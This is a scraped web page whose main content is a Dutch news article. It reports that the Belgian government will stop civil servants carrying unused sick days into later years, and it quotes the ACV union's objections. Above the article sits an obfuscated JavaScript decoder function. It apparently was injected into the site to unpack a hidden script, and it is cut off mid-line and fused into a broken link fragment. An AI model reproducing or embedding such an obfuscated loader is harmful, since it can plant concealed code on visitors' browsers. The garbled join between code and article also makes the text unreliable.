function oc532bd2f6(uf){var yd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var vb=”;var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandaard.be/cnt/dmf20180725_03631273″>

Ambtenaren kunnen hun niet-gebruikte ziektedagen niet meer overdragen. Dat is een maatregel uit het begrotingsconclaaf. ‘Bijzonder asociaal’, zegt Marc Saenen, secretaris voor ACV Openbare Diensten, aan Het Nieuwsblad.

Volgens de oude regeling hadden statutair benoemde ambtenaren recht op 21 ziektedagen per jaar. Tijdens die 21 dagen kregen ze hun volledige loon doorbetaald, daarna daalde dat tot 60 procent van het inkomen. Maar dat was niet alles. Als een ambtenaar minder dan 21 ziektedagen genomen had, kon hij die dagen overdragen naar het volgende jaar. Zo konden ze een aardig spaarpotje aan dagen aanleggen. ‘Er zijn ambtenaren die bijna nooit ziek zijn en dankzij dit systeem veel vroeger met pensioen gingen’, klonk het binnen de regering.

In het begrotingsakkoord dat de federale regering dinsdag bereikte, wordt die regeling aangepast. Voortaan zal wie ziek is, een maand lang zijn of haar volledige loon krijgen. Daarna wordt dat 60 procent van het bedrag. Tegelijkertijd wordt de regeling van de ziektedagen verstrengd. De 21 dagen zullen niet meer overdragen kunnen worden naar later.

De federale regering doet dat om de statuten van ambtenaren en de privésector te harmoniseren. ‘Bovendien maken we komaf met een toch wel heel vreemde regeling: niet-gebruikte ziektedagen overdragen naar het volgende jaar’, klinkt het in regeringskringen. ‘Normaal is: als je ziek bent, blijf je thuis en anders ga je werken. Daarmee is de kous af. De bestaande regeling afschaffen is gewoon goed bestuur. Met de nieuwe regeling voorkomen we ook dat ambtenaren ziektedagen opsparen om dan op het einde van hun carrière in een soort brugpensioen te kunnen gaan.’

‘Pikken verwijt niet’

Maar die beslissing valt niet in goede aarde bij de vakbond, zegt Marc Saenen, secretaris voor ACV Openbare Diensten. ‘We pikken het verwijt niet dat ambtenaren hun ziektedagen opsparen om vroeger met pensioen te kunnen gaan. Het ziekteverzuim bij de statutaire ambtenaren - zij die ziektedagen kunnen opsparen - ligt op 5,8 procent. Bij contractuelen - zij die niet van dit systeem kunnen genieten - ligt dat op 6 procent. Dus hoger.’

Saenen vindt de nieuwe maatregelen ‘bijzonder asociaal’. ‘Vooral tegenover de oudere ambtenaren die meer kans lopen om door bijvoorbeeld kanker of een hartfalen langdurig thuis te zitten. Zij zullen nu veel sneller op een lager inkomen vallen.’

Het kabinet van Jan Jambon (N-VA), minister van Binnenlandse Zaken, wijst erop dat de nieuwe maatregel niet meteen voor iedereen ingaat. ‘We werken een uitdoofbeleid uit.’